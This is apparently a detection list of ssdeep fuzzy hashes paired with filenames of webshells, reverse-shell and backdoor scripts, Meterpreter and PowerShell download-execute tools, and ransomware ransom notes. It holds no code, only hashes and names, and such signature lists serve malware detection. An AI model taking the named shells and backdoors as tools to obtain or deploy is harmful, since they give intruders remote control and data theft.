+24:WngPZspZW9xUp/f9EexMTjM0fAs8Z1KMZL+9d1o527M0fAs8Z1KMZL+9d1KS:/ypkQF9uM0fWm4+V8aM0fWm4+VKS,"injektor.php.12"
+24:WngPZsprs9xUp/f9EexMTFvt4znujnxS5ESI52tvt4znujnxS5ES6S:/ypYQF9kvWznoA6Sc4vWznoA6S6S,"bad.php.28"
+24:WngPZsprs9xUp/f9EexMTFvt4vpuvVF6PC2QA52tvt4vpuvVF6PC2QiS:/ypYQF9kvWxO27QU4vWxO27QiS,"bad.php.24"
+24:WngPZsprs9xUp/f9EexMTFvt4uuuFNFH52tvt4uuuFNF3S:/ypYQF9kvWuhFN34vWuhFN9S,"bad.php.10"
+24:WngPZsprs9xUp/f9EexMTFvt4TAYSc52tvt4TAYSmS:/ypYQF9kvWUYSg4vWUYSmS,"bad.php.1"
+24:WngPZsprs9xUp/f9EexMTFvt4QvaWhBI52tvt4QvaWhB6S:/ypYQF9kvWQvaQBc4vWQvaQB6S,"bad.php.8"
+24:WngPZsprs9xUp/f9EexMTFvt4QNEK+7eXMYT52tvt4QNEK+7eXMYrS:/ypYQF9kvWOtXhF4vWOtXhrS,"bad.php.20"
+24:WngPZsprs9xUp/f9EexMTFvt4p2mG0MvU1U52tvt4p2mG0MvU1uS:/ypYQF9kvWpXG0U244vWpXG0U2uS,"bad.php.35"
+24:WngPZsprs9xUp/f9EexMTFvt4NEVNvK52tvt4NEVNvUS:/ypYQF9kvWN4J+4vWN4JUS,"bad.php.37"
+24:WngPZsprs9xUp/f9EexMTFvt4mXb8qAkYTcL52tvt4mXb8qAkYTczS:/ypYQF9kvWmH4cd4vWmH4czS,"bad.php.18"
+24:WngPZsprs9xUp/f9EexMTFvt4LyqtG9I52tvt4LyqtG96S:/ypYQF9kvWNG9c4vWNG96S,"bad.php.3"
+24:WngPZsprs9xUp/f9EexMTFvt4lc6CJo552tvt4lc6CJo5S:/ypYQF9kvWlc6CJk4vWlc6CJyS,"bad.php.26"
+24:WngPZsprs9xUp/f9EexMTFvt4lBeoDfh52tvt4lBeoDfRS:/ypYQF9kvWq44vWquS,"bad.php.25"
+24:WngPZsprs9xUp/f9EexMTFvt4Kpcu6052tvt4Kpcu6OS:/ypYQF9kvWKZ6Y4vWKZ6OS,"bad.php.32"
+24:WngPZsprs9xUp/f9EexMTFvt4K/f3D+c52tvt4K/f3D+mS:/ypYQF9kvWK/fD+g4vWK/fD+mS,"bad.php.27"
+24:WngPZsprs9xUp/f9EexMTFvt4jpiXfLL9I52tvt4jpiXfLL96S:/ypYQF9kvWQLL9c4vWQLL96S,"bad.php.34"
+24:WngPZsprs9xUp/f9EexMTFvt4ifOhzy39I52tvt4ifOhzy396S:/ypYQF9kvW2yy39c4vW2yy396S,"bad.php.30"
+24:WngPZsprs9xUp/f9EexMTFvt4i2qpFtRnVP2CwiF52tvt4i2qpFtRnVP2CwitS:/ypYQF9kvW0FtRN2Cv4vW0FtRN2CFS,"bad.php.11"
+24:WngPZsprs9xUp/f9EexMTFvt4HYl4Xp9I52tvt4HYl4Xp96S:/ypYQF9kvWLXp9c4vWLXp96S,"bad.php.29"
+24:WngPZsprs9xUp/f9EexMTFvt4HNEK73DzW52tvt4HNEK73Dz4S:/ypYQF9kvWtn3De4vWtn3D0S,"bad.php"
+24:WngPZsprs9xUp/f9EexMTFvt4FpbnZ3Nx52tvt4FpbnZ3NhS:/ypYQF9kvWFpbZ3Nj4vWFpbZ3NhS,"bad.php.19"
+24:WngPZsprs9xUp/f9EexMTFvt4F8Viewyhu52tvt4F8ViewyhAS:/ypYQF9kvWFWiewyhi4vWFWiewyhAS,"bad.php.5"
+24:WngPZsprs9xUp/f9EexMTFvt4dYRoLCysfWDQCyp752tvt4dYRoLCysfWDQCypjS:/ypYQF9kvWJ2fWDQrpN4vWJ2fWDQrpjS,"bad.php.16"
+24:WngPZsprs9xUp/f9EexMTFvt4/D1UV52tvt4/D1U9S:/ypYQF9kvW/D1q4vW/D14S,"bad.php.15"
+24:WngPZsprs9xUp/f9EexMTFvt4cXwJEq19I52tvt4cXwJEq196S:/ypYQF9kvW6wD19c4vW6wD196S,"bad.php.39"
+24:WngPZsprs9xUp/f9EexMTFvt4cIVjbJapBz52tvt4cIVjbJapBLS:/ypYQF9kvWc6jsBl4vWc6jsBLS,"bad.php.21"
+24:WngPZsprs9xUp/f9EexMTFvt4CBFDxRFQ52tvt4CBFDxRFyS:/ypYQF9kvWGDxRFk4vWGDxRFyS,"bad.php.13"
+24:WngPZsprs9xUp/f9EexMTFvt4Ap/BtMtA+wXXqYPr52tvt4Ap/BtMtA+wXXqYPTS:/ypYQF9kvWApDXX7V4vWApDXX77S,"bad.php.4"
+24:WngPZsprs9xUp/f9EexMTFvt4AfoGl7rBJPg52tvt4AfoGl7rBJPCS:/ypYQF9kvW2o4vW2eS,"bad.php.2"
+24:WngPZsprs9xUp/f9EexMTFvt49HaMV07ue9I52tvt49HaMV07ue96S:/ypYQF9kvW9HNV07ue9c4vW9HNV07ueX,"bad.php.12"
+24:WngPZsprs9xUp/f9EexMTFvt49ByD8294K/9I52tvt49ByD8294K/96S:/ypYQF9kvW9MDHx9c4vW9MDHx96S,"bad.php.9"
+24:WngPZsprs9xUp/f9EexMTFvt48DUrfS2QmdU252tvt48DUrfS2QmdUYS:/ypYQF9kvW8DUrfS2QmdX4vW8DUrfS2w,"bad.php.38"
+24:WngPZsprs9xUp/f9EexMTFvt484CYunuyclr52tvt484CYunuyclTS:/ypYQF9kvWXon2v4vWXon2FS,"bad.php.14"
+24:WngPZsprs9xUp/f9EexMTFvt47diSUbJI52tvt47diSUbJ6S:/ypYQF9kvW7dJUbi4vW7dJUbAS,"bad.php.17"
+24:WngPZsprs9xUp/f9EexMTFvt44QY+2QvXlAntE52tvt44QY+2QvXlAnteS:/ypYQF9kvW4O4vW4kS,"bad.php.7"
+24:WngPZsprs9xUp/f9EexMTFvt439fDlIaAkWqgT452tvt439fDlIaAkWqgTqS:/ypYQF9kvW39fDCT8gM4vW39fDCT8gqS,"bad.php.31"
+24:WngPZsprs9xUp/f9EexMTFvt42zoT52tvt42zorS:/ypYQF9kvW2zoF4vW2zorS,"bad.php.22"
+24:WngPZsprs9xUp/f9EexMTFvt42GF4kYR9I52tvt42GF4kYR96S:/ypYQF9kvWboR9c4vWboR96S,"bad.php.23"
+24:WngPZsprs9xUp/f9EexMTFvt41p4O7Ttx52tvt41p4O7TthS:/ypYQF9kvW1p4O7TV4vW1p4O7T7S,"bad.php.33"
+24:wmHr+1CDHNNuZO/gIZEW4FMi+uDIDuej19kGSIDrPC4EdKtDE:PHSUDtD/x6WIMiv7ejwGNDrPCatA,"aspmuma.asp"
+24:WIlfdfA7Ki8Mq6LiQDv1ZqJafBbqBRdF3He13MYuEeL28jAYflVhYIILkJ1yL:3whq6LiQD1eafBb4fHiMY188YlXIeyL,"12d9ef401fa2f5e15b71c2fa901de12b_php.txt"
+24:WiGLmRHlyB1sTyiG/4w4LvLdXKkcXUrIpNIj0WFU+rINKNpLbE:im1lyB1as4w4LvLSLzqlw,"qun01.php"
+24:WhxcSowZToLn79jB3xngh6RyM3Ys3xc+z6UorNnnHXe8hnVAV86Y03x9sfajsUn:scsTQjfn6gf3n3xcPnnHXe4VYLYk4adn,"K7EZPTw3gETg"
+24:WfxYtRbPK27jt6vGcQUtyvuEwTPYsNq72yFnLMvduV/JW8K:EMK27Mecx8uEsYs872Mglm/JW8K,"proxy.php"
+24:wAoWpefau7XXgkFCWiWSdy7gPXp46+LQlGWxTNKF5xnmzHj7ydneBNhDXrV:wAYfrXwkdnqySC6+LQMuNW54zHPynINv,"2fa31f4dd9ba365f4609c4a854e46a5e_php.txt.orig"
+24:vZO7+cvT3AUW+6A4fPupX4RA4fPReWGTGzgadwuL:vZRqT3UAEFRAEJeBVGl,"2016-04-07-EITest-script-in-page-from-compromised-site-second-run.txt"
+24:Vw0MkHIaQLmpHLJYZw4LzfIgwBqSStXsYj30bt9q0TUlTxoLDivomYnU1bnUHw6H:o8IqZwwGsgCqSgXsY7cqVzvoF++3,"Backdoor_Reverse_Shell.jsp.txt"
+24:VVmounfoqfE7JRzvLknxbn2+WUqXeitk8ZOmoun2Xt7xbnyJ9XZo:youk7SjBsXLk8ZJou2Xzjy2,"Invoke-PowerShellTcpOneLine.ps1"
+24:vs7Ts1J63AUKv2vzuV8MpXrGzuV8yWGTdJGKzgS6wu+:vms1J63WSFa6FyB5JGtpk,"2016-04-07-EITest-script-in-page-from-compromised-site-first-run.txt"
+24:Vqwe4dcEEtYQcQSSbrI81PFR4zY8peKaua6ypnuIQ7JPOiBQOO:Vte4dcEOSS9dRAYqelu7y07NOiBQOO,"2017-02-22-pseudoDarkleech-Rig-EK-artifact-QTTYUADAF.txt"
+24:vnKi80Wz3bc3NHP1du7SBKWmgDKRWoCnMrGg0kpEsoU7wQmWjBfl1xmJfvCtxWTU:xW7WB1dS6KWBLrM0+oU7nrjNUVsyU,"Asp最新变形一句话2014-11-21.asp.md"
+24:/vMckK96n57pJNgwXVvql2FO4VoJ2AbcJl2+bekrbcbf:/vMcmjNDdUH4GJoJk,"README.md"
+24:V+HCHhT3R4nhYVsLYUomnq49MDKjgofDW4qWYignze6dVM9EcWmDK4LkKKd:sHiR4nQsLYUouz9CKNqWY1eS0Kdb,"ConnectBack Backdoor Shell vs 1.0.pl"
+24:Vgh/ui3e6eY/NtqyiJ5G6Wp8e0F9QXYizK:CFeY/NQ28eG6Y/,"readme.md"
+24:V3VGpOOYLt+yjFus6unuohZEHt/S2V2uR1QFOD8YD:zqOXEybnua2Ht/B2uR1NDtD,"mal-jun3-2.txt"
+24:v1w8NhTLdaoXSssSZHnsjHT1lQXf99VS9PGcS8jX62d5:dw8/9aoXSZSZHnezM9mRGclX62d5,"Backdoor.ASP.Ace.o.asp"
+24:UZQzD5pKBGWMuRX5Y07smGhUfn3+SzR5B060:+GD5ZYm07swLa,"mod_cgi.shell.bash.htaccess"
+24:UxGQZy7yzQG4OSQEqbbBiSEZshWMRwJuyfjoCKuapMmS+PQV5aEa1EC:pQMu4dQEqbdi9u8swJ5HKVpTMi9h,"20160208-061323-VrelY2juZ1YAAAhy2d0AAAAk-file-OFIYS2.1454876003_1"
+24:UwhICS2RS/0MZUBtzylHdxiGkR+4iYyr07rPy7pZSDhfNOpNGjlc5RFBFz07Ih:UweWS/0iPfiGkRnryyhfrgFmIh,"Asmodeus v0.1.pl"
+24:UQBgvtERkGTyeOOf0pNpOxfvOD0GOE4V2aa/yX3AOH1GxYIWM3TUoaH:DUEaGeeQNwy0umZa/G3TICIL3tQ,"cond-sep28-redirect.php"
+24:UnlOGQMB3DoIc9sMWYWy7XTp9dJt/oCKuapMmS+PGluB6NEX:aQMDoI2wfy7jp1tzKVpT3B6Y,"20160202-201055-VrCAr2juZ1YAAB6bXkMAAAAW-file-aDCxOj.1454407855_1"
+24:uFhPc2Wv48M9x5ySYNUL0qpO8IooUn4wj7ngqD7M4d:uFhU2L88x5ySYzE4Un4JI9d,"php_httprequest1.tpl"
+24:uBMW5YXG5WZOyzDKnUDNk+2rSUF5fX0mCyR:OX+G5Wh3SYNk+KSUXcmtR,"htshell-em.pl"
+24:uBMW5YXG5WZOyzDKnUDNh+cerSUFgjforzEbC:OX+G5Wh3SYNh+tSU2jczMC,"stsh.pl"
+24:TyeL5ZOEqWVzzJoFs9MDJVaDMa6A92MQ0Ddgi6lJ:TyAOEqmJoRDva56AjDdVE,"connect-back.php.txt"
+24:TWw7vi3pVK5wTz/Y7oLgzWyLDFzFAXjU/ezs/j6X+YnaIx+83mquHahPPiTPPic:TWw7viZnN2W0zFAwW8UnaB82MhiJ,"VirusShare_2d4b3a607b208a24830593c9ad9f9071"
+24:tocd+0Cu65pGYJZMJTidIpU8Ywv/XJ75Gm0MlB:t9U0CuecYJGZOIFPJ75GCB,"strings.py"
+24:TDUssWftA74kvZqrSRQvhF3v96itLmWN7ABMuOA:Ms/AHZMSRQvhZRmc7ABMuOA,"logx"
+24:tDLHyX9xxCEGJQnvn0KqURvCU/WRisL6bV4ik:1LHyN8Jyv0JURj/cisumx,"1.jpg"
+24:tCEd60fPhj1kGa43EMKiHFDiYFcFuvIcpRwD7jaEp:tXhj7B0MKUFDXF0LcIX,"asp wget drag database.asp.txt"
+24:tawyQaV9kMFt/z0kMFtPVnLuZycvkEjKYv4zmTYK/X38467:tawyQaIM/7lM/VVcRjKYvgmk2Xs467,"php一句话后门.TXT"
+24:StZeQ1+aiA4wEZWFI6F5CbOUWNPhXAvuIZY/j3UGV1C/Lme6A498lxUcW/v:SreQ1Zj4wEoG6bPPNpQvuf/zUZzM2/U9,"cmdasp.aspx"
+24:StZ0Q1+JAJYVe8Wa/8IZYN1Ve1wEDMFs6F5p/nelN0Z4HBcB3:Sr0Q1VJiexa/8fhe1wEYS6bMN0ZgBcB3,"webshell-simple.aspx"
+24:sScja5ZZ+s5hQdlUHFL5wUHFKicuNVxi7NVxi4V4ibZQHzWze5SQ92eAJAeaDNEQ:Zn5q6tw6KqMcvTxAQMeAmea5fZai,"tree.jsp"
+24:sQzD4bfn3+SLlCP/x0tP5NlQ/4K6JHWJW7:sGD4ZlkxmNlQ/4Ks,"mod_include.shell.htaccess"
+24:sQW5/1Difn3H2Y64LaQ6SDrcQnn+ciNR9gbIa3GVseaHQDGrtfag:sDl1DaLLEfXaGaEG9N,"mod_php.stealth-shell.htaccess"
+24:sQW5/1D4bfnGfY6ELaQTrcQnn+Ee5DYrtf1g:sDl1D4aiLIFY9+,"htshell-em.php"
+24:sOvfpPMK5ecq22t0uB9byuq2YACHsoIfwOuOeoskYAVCuwXlaovlf:/vfpP9ot0ybFYL3IJfrstPVlnN,"ChangeLog.txt"
+24:S+JdRnDZkRQjdX2SkEP+p54YkIlZb/MSCMlkpcKE19IlDcmA:SgdgyjdGX/5ZrckkprEyDcH,"shellcode.pyc"
+24:SHQ1+q+zwE1uFI6FErzJNgreKK+/ABYIZYU4YMqHNRGVPX/w/qe64ZZ498lCk:SHQ1EwE1uG6AJNlKPABYfU4PqHzo4e2n,"cmd.aspx"
+24:SGLmRaCeyj3T/iG/4w4WvQH1lqHXFqUqkqqCq5qYq/q2hqjJq8qYq5q2q/qUqFqV:5mQ7yjjp4w4WvQH14H0E,"20160205-011450-VrNq6mjuZ1YAAHa4OxkAAAAa-file-4y1rAt.1454598890_1"
+24:sC9aeuJEp3D7cmwoviXCjopq3wkygziw6gnUFWANYoyntVgbbKnAsm3FBbRbKxz3:PNuusovo+ojW6MwLNYlgbKnk9bKNL,"修改属性.asp"
+24:sbCW1RgOMpFI8cIMEyVA4BwzmO9cJCj0YMRrfmIOXb/XCS494w4T4/+40y4U4X42:s+PFIfp9VA4BwzmO9mFOIOjyS494w4TH,"action.jsp"
+24:RxFoXNpva4mXNmcOokGUhf3+UGiWOQunE+8MtomP4V/HwV7LGv2+hlWQNm522r7n:Zo94dNlUhf3+UM6E+8qP4VIV3Ge+hl9k,"Readme.md"
+24:RxFo9p+a4mXNmcKiokGBhfoJGhOQunE+6SJomPC/Hw67LGv2rsE7QN4e2rWCRUtc:Zo9Jdu9lBhfoJ66E+BFPCI63GersEMqz,"Readme.md"
+24:RurXAM9pgH1b8gYbaqup5cbEKJMPIYydFIYCeZooUF7nyfDP7O4WyUaDsA/WCvBI:MAi6Vkup5cbEpPsdFV07AzOyZDICW,"meterpreter.cpp"
+24:RPht9tjutGAZ3XW/TGsdHQM8OyfnNjLMCotmO3/WmVEPbKk2nHeMOBK+lZ9eKr:nFAhW/5uMlSnNjLMD1VEOZJOpNr,"Blind Shell.c"
+24:+RmvFXq4SYF/i/6Nv2LvFHPRLQjJa2P4SlkkzUF//Q6v/VEQIt5B5U0TnvH:+RSF6tSlYFHcoOokzw9vtEQIt5Bq0Tn/,"phpwebshell pass by waf for share.md"
+24:RiwycMzASsC3i++ixvDLbD25RbE5YTqHrIULoqUX/Drv/Gaz:Vghi++YvDL/WxEc4cULoTX777z,"上传马.php"
+24:ridsj30+3cHFIUPWRSaLrljOTGIvNLQfJb4afd30ksK/aP:+Wj3slIUPWPa9NMJJfdi1P,"poc.php"
+24:rhYiimmOdZrMFRqyU8JmFFys7AGfQCCmwZDLNC/8cZOH:jXrrrtytGfQxZ3NCJQH,"2016-03-29-TeslaCrypt-decrypt-instructions-all-samples.txt"
+24:RGrPuKjr+M2WOMvaLAzKg0A99PzAWwFdlX0S3uq0rI6OpeC09VLAhNH0TROWQSLW:MjqM2WVvXOgV9rQ0S3unI6qPSar4w,"sql3_udf.c"
+24:rCvmlpIwn1dcwRJawT/SNYixh9RYAlrm8B17Ff/iGsTrgi5n7VrP1G:vF1xJam2YqfYd8vZDsTrppY,"2.php"
+24:rbJ4ohbNCoat0WS454+KL4J4HMpLA2YkA/vPq3DgjPOZ9fBl6LaD:hHpaCw++TOHMpapH2SLaD,"xslt.aspx"
+24:Qzm4k/gByWROGik8WElpwNMyG+xFMh+vKIvnCfDHP08OtqGryZm:v4Cg0WoGPKqmgxqTenUOxrQm,"2016-07-08-Cryptobit-decrypt-instructions.txt"
+24:qwoQfKdkno58KrtM49l4oU9bctwBnCmt3bI2VmeNrpq4HBnFuUdBDV2n:qxQfKdknyJXg9wtwbnVvrsewn,"jquery-code.su-charcode.js"
+24:QWFXov1qeHXC6tlc8FM5e3551QMRZwV3AiwrxCA4Qy:GvpcteVQSZG3aVCA4D,"Backdoor.ASP.Rootkit.10.a.simple.asp"
+24:Qutuj8eWorDW7FsW7LJWTW7wRWSS2W7FNplZW7fW7ql4wW75YEaidd:NtXehMplvvplSwql48iP,"Aspx设置权限.ccc"
+24:QQmHlgGNx4oC6Yh/cEuFwlxKlgFY582AD2ADaRGXP3kADlwyADbud375kADvwoAz:FI4oYZ0C2KiXK2KLvkK+yKWdkKIoK8PS,"php端口转向.ccc"
+24:qPEWItjve77QI6r7j6+7jn7Rq5m72V5m7S86Y7Su807S2ym7Sb8T:qPxajvdWmqRjZUPT,"LogonUser.sln"
+24:qPEWItjRqhaE7I6YxaEW6JxaEUUxaEgqDxaEFVDxaEs6HxaEe8TxaEmmxaEL8T:qPxajkPYxHJxXxIqDx/DxhHxzTx+mxQT,"NTFSParser.sln"
+24:qPESnjmkGRQ0LfI6A0G6B0Es0QqFV01VFV086H0u8D02SV0b8T:qPFjBSLAiBUFqT2TMHmDTO1T,"DemoDLL.sln"
+24:QnhtvbxoQWs1h+LY0Htbonlt27vv2JwLK827PcA40fkVzzKVlwz55S:4vbl2olt27GuLK827PVfqQwzXS,"badfile-3nov2016.php"
+24:Ql/VPs6An1shYki0uNj6cr020AIhg1E96v3U23IlQs48g7Rusfi:o06An1faC+6Qni1E97lFvsfi,"16082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs"
+24:Qlm02kWhSKjKROy5w6AIQg1E96v3U23IlQs48g7Rusfi:p02k4DiOy5w6nv1E97lFvsfi,"VENC25072016axZ5MUdyYrNCCIIins5Chept7INWARCL.vbs"
+24:QlDX0M+9koDfFN2SCIOzKrSCd8AI74RRg1E96v3U23IlQs48g7Rusfi:SHlozF8XpzKrX2nL1E97lFvsfi,"VCTO23082016pozmo4ozQS0aWjcgqOpMjOyKwYU6sDvQ.vbs"
+24:QlDNEPErm9S8Oltm9ckl2vm9kWOAIAjg1E96v3U23IlQs48g7Rusfi:KV6S8O6ckY2kWOnz1E97lFvsfi,"VENC15082016ffmud0qJIKUpZ0wTBSLZrIg8f86C7OuY.vbs"
+24:QjtcTrhmZlcesyyesAcJ83m/Fa0EBymkbC0xn4gBNqD:Utghm2esyyes/JcCdHmkJxLBNqD,"ansi.py"
+24:QjtcTNOMxsNu3v8i3v0qxNsbK9robHkWNNRt3BRchzc0TX68Dm3ARK9Rhdm04:Ut6j2Nuf8ifVxNsLkWNNRhBRQQR8D8AF,"initialise.py"
+24:qIyZQHj8poEMGGJ0ghp54vJuk+oJq3MXwMGGJ0NZzqMtP0BS9:rqyKQpMYKVKTqMtP0BS9,"xslt_exec.ps1"
+24:QG1o2ah1QiyUVOkHxHqTbVZ2+GUs3CnJk+HtQs+h+oT:BBg1zyUjH0wHy9i+E,"__init__.py"
+24:QG1o2ah1QiyUVOkHxHqTbVPzZnTsfBtcWoW:BBg1zyUjHSzZnTaBtcWoW,"domain.py"
+24:QG1o2ah1QiyUVOkHxHqTbVizZnUpjum5XVNs:BBg1zyUjHlzZnmu+4,"tmpfile.py"
+24:QG1o2ah1QiyUVOkHxHqTbVhzZnuwsfQnINggX9W:BBg1zyUjHCzZnuwa7NgS9W,"ipv6_address.py"
+24:QG1o2ah1QiyUVOkHxHqTbVhzZnqwsfQnSbSgX9W:BBg1zyUjHCzZnqwa9bSS9W,"ipv4_address.py"
+24:QG1o2ah1QiyUVOkHxHqTbVhzZnMsfQbVbl/WhW:BBg1zyUjHCzZnMaebl/WW,"hostname.py"
+24:QG1o2ah1QiyUVOkHxHqTbVH/WzZnKmMtdMH7HVX6R1:BBg1zyUjHeWzZnKmU,"system.py"
+24:QG1o2ah1QiyUVOkHxHqTbVdzZnWdsq+/fBZ3o6sM:BBg1zyUjHCzZnWdL+HE6sM,"submit.py"
+24:QG1o2ah1QiyUVOkHxHqTbVdzZnINzmAYVPUg4:BBg1zyUjHCzZnI9mLPU7,"dnsdict6.py"
+24:QG1o2ah1QiyUVOkHxHqTbVdzZnCs1+rsUdM:BBg1zyUjHCzZnCq+IUdM,"iterate_links.py"
+24:QG1o2ah1QiyUVOkHxHqTbVdzCnMQt8CJrrcVRg4v0:BBg1zyUjHCzCn7NJrMR50,"ping.py"
+24:QG1o2ah1QiyUVOkHxHqTbVAzZn+Zs9NfkwHIcNRWbVbcEw4NERbFbGRN8l:BBg1zyUjHZzZn+ZSZHr6bw4YbQRml,"ipv4_range.py"
+24:Q2kzFyvesp85lmNVLTGvepc805wJ485N9MCLGmELgves4NQ8q0LdLH:gTG85cnLNpc8k853LGmELbrm8TLdLH,"ASP读终端端口.ccc"
+24:q15RM9eyt2kATRztztHMaRfctY3YIRmTr0cc2LapxKAZUHjsn:YysTVFgU/qtw,"N8.jpg.1"
+24:q0vxCIqDHuWjHudZPX79Hyn0H/fTOZbsblPlOZ5R87lFyG:nhqPg1ly0nT0slPl05RKlF,"rcpexp.pl"
+24:pEIwjAUeAciEPdDqkKgx7KYRXFSihihFznizAvi0IIiPspL8AvJWcfufRSiTO+WS:pHwUUjBo+kKy7Ka74Xzizui7M/vJI7GS,"go-shell.cgi.txt"
+24:PBHd64AJGFOtkWvLhcFknHJHIXMLGHS2dd4JtF7L7oB35Er4fvHfAN3WXYOs0Dc:PXAJGFOCenpBaP8TLQ5hn/ovr,"mailer-sql-backup.php"
+24:pAssv3fGq4RZtMvSEQvO7bpntyx9ri/dFWvAMmTJBMBF:GsOenZQSEQvO7sidFoAMmTJBMD,"logx.3"
+24:p31RgBilp5RAUMzoFSKAHD7X6mBR9BkEQBkAuuWBBS/RW+9JHqor:KEn5RAUMMFSpD7X6mBDiEQiAuugSZf7j,"同时上传图片和马的上传利用页面.html"
+24:OZDzf6K6Q0BmYX1GmftQEAV3Xx3y7q1q8O3U69V:OZqtQ+tX1GMtQEyFy7y+kGV,"readme.md"
+24:OYbvxZ5arq89APSZ/4X+OXcCXvP6PYiMCMCCT5T5TKrleE0cGCPT3CTgrei6M8CK:hxZm9Aa14zzfCrDDCT5T5TKRFVPT3CTX,"bypass-waf-2015-06-10-01.php"
+24:O/WcGRpujPmPpPRERSoLGRik8ZLGRiZxoRn0RM3n0RKtgojX8Q:5vujPmhP6xC98ZCux40a30ygZQ,"Server_Variables.asp.txt"
+24:ovmN1rzmL+/nrfAu5nLKLTp2kxyT2NgnRnD8f6KC210ca/bf6KC2H0PX2LAcQQId:fN1+LlaLKLNZgBRIS3tca/bS3BPhQ87,"Base64ToString.ps1"
+24:OV9QJXQILgD9C7SwKjB8y4skRbsL4J7S52eYwsTdhd/4:QQN7SwAEvRbF7S02sTHp4,"529.php"
+24:OV9QJXQILgD9C7SwKjB8y4skRbsL4J7S52eYwsTdhd/03xWaoelETXjb:QQN7SwAEvRbF7S02sTHpKxWIlIXn,"529.txt"
+24:org+12EUahDkgXg9f8bLTtIBkbynHn99DM+LAjg/Z+LA9SK0523OkU+L:v+1292YgX1LTVyH9Wq/ZqkK+L,"StringToBase64.ps1"
+24:oNxwz9EYutrefBmQYowF4vdKXrky2rdZ4Iihf:om9EYutCfUtoY4lokvCIihf,"50d386d8e06bc429ac6c7af5b174ffdb_php.txt.orig"
+24:OMoxeaO0QFgCkOlYuYIhW6fNvizxMWzSD5g0MxRWswSe81/rld3q0lynfuArYF8b:Rfaa+CTlYyhRizxMV5gxsswW1Tv3/AuM,"malshell22-2.txt"
+24:omJOC+ik6dXjaRV2Sp6nIXWqRx6ftqDK65dV3eq65IE6YePj7:7Jj+SdUV+nI7RoteKydV3eqysPj7,"def3.php"
+24:OkHuXal68HL6E8wfLzvV7u/w5YELywC3gI9blTXlTYIouhE+iioi5nUM4nUHDHJw:O8cUowjQScHb1vMioaMudQ,"reverse-w.jsp"
+24:OkHuXal68HL6E8wfLzvV7u/w5YELywC3gI9blTXlTYIouhE+iioE5nUM4nUHDHJw:O8cUowjQScHb1vMiogMudQ,"reverse.jsp"
+24:oBC/bskoXaXOBA3QSvUfBVHnUrqk+gSIK:J4kRXkbSvoRna0,"Usage.md"
+24:O2XCvmlpIwn1dcwRJawT/SNYixh9RYAlrm8B17Ff/iGsTrgi5n7VrP1f:OiF1xJam2YqfYd8vZDsTrppV,"b69686038b4d8961c34fad7ea5904660_php.txt"
+24:o1SE185X61uCTeMCnaTefaTLA3Iqk3ma5ZUERuk8XZwNZzYqJ1qJSf5yjWnpWIto:o1SHeU7QSQvZR38JiCIzRsuRef4xlKLj,"minupload.jsp"
+24:O/0zeEejVmdKdid1i3/PDXi5QCTGTGqNTzjO6:HzeEAI3cnDWnS/NLO6,"EmfUYSaU"
+24:NvC2HeS6vxCZmZTCkUyzzlXCbPZW1qB8xcgL3i4Tg1PEbqMYy2c7Kv:N/HycYZmkhNqZlB82u1TELMFf70,"shell0202020292333.php"
+24:nMxDXvT9OEz5j7OYKmQw9JXaCHec3kb911t6dDPWqJzSNNbdRLo9Uo6HA12/lksf:MxTT9fde4QL8kb9Dt6dD+aSNVbkyHAzu,"xp.php"
+24:NmS27D27yhnF27f7PM/wOacwy7UNAFG9Ap/eK+C6uSFAv:V27D27y/27f7P0KA8P1CTQAv,"88b8940860f71890ab85dfd7e693ea92_php.txt"
+24:NlELjk4Jl42LjBJlS9BlUlulV7foawh3jHvzfll:btjkawdjHjb,"redirect4.php"
+24:nk+2p/6zgoivzi/27JAPZiQ5DIlcd26zMXm4VQjix3UZb9SA6AMM:k+sSU7+27jQNMy1JDEUZYA6Av,"10mIMbox.txt.2"
+24:nk+2p/6zgoivzi/27JAPZiQ5DIlcd26zMXm4VQjix3KQXc1Zb9SA6AMM:k+sSU7+27jQNMy1JDEr6ZYA6Av,"Rfiemail.txt.1"
+24:nk+2p/6zgoivzi/27JAPZiQ5DIlcd26zMXm4VQjix3iZb9SA6AMM:k+sSU7+27jQNMy1JDEiZYA6Av,"Rfiemail.txt.2"
+24:nGLmRaCeyj3T/iG/4w4WvQH1lqHXFqUqkqqCq5qYq/q2hqjJq8qYq5q2q/qUqFqQ:ImQ7yjjp4w4WvQH14H0l,"20160205-011438-VrNq3mjuZ1YAAHfHRs4AAAAR-file-uYaKDl.1454598878_1"
+24:NbZQD06RvcIQpC/Bm+REwWBCiFZ6OgKMUS+UGU32Uy9PO85MpzLKWCf969pWNWb7:NNafRvcIV/B7REV7H6OgKMUJUGUGUyf+,"ajn.asp"
+24:NbFImUpC/BmTwWDjpOKESem32y9PO5ZOKWCjLpWNWb7:N3x/BO9OKEHmmyA7,"Ajan.asp"
+24:n1K8u27JAeeZfFM4DCCwQjvvgXmI7vfquB/ROSxE3:ns8u27DeZfx5I7nquBJu3,"mailer-pagsegurodisputas.php"
+24:n1K8u27JAeeZf7IamDRzQjvvgXmIvfqqB/ROSxE3:ns8u27DeZf7kw5InqqBJu3,"made.jpg"
+24:M+MNmfvVpFYgekCvZnd9FI29axKCILmID6hFt8G7HFSbM6F5GYBGd8nmej0CW66/:smX25kwRiWCjvXr8I6b5Pnm0W6Iuy+0P,"cmdexec.aspx"
+24:mMIV11ZM3Vv/JFLJJUsbwUH52o1SccM6RUB:mzV11ZKVv/JFLHUGwUZjwW,"Download_Execute.ps1"
+24:mDA8pOjkkOS6DqPimAEOLD+iz24oM/mZmhtFGpaNpZVPqLQ/ShIFzVojbC7oxfki:Y947+uqmALNoMgItFGpazZxzMC7oxfki,"mal3.php"
+24:M7IhNGxKH7ZFQEqRa8q+aB/XGE2QxmA/5qcfmy+k5qcXcdO24:Mi0KHVPqQ8q+aB/XKQoA/5qgX+k5qSca,"bin.php"
+24:lwvjejSR2cyAOkHjlaTbVNcB+SzyYAb3XD3zeDKn:6jeuRJysHjMc1yYQ/,"ContentTester.py"
+24:lwvjejSR2cyAOkHjlaTbVNcB+Sz0fOAkAl2VW3mDfvuEXREJw:6jeuRJysHjMc10fOoW8+2Jw,"NotFoundTester.py"
+24:lwvjejSR2cyAOkHjlaTbVNcB+SwON7AVrZ7mtPnMf/JNrPf:6jeuRJysHjMcOo06VO/DDf,"JSONReport.py"
+24:lwvjejSR2cyAOkHjlaTbVNcB+SQBdLAq8j:6jeuRJysHjMcCBdLh8j,"StatusTester.py"
+24:lwvjejSR2cyAOkHjlaTbVNcB+RuqIZ7dCNCluil2bxkZYFR:6jeuRJysHjMcmuqOxCNC4E2uU,"PlainTextReport.py"
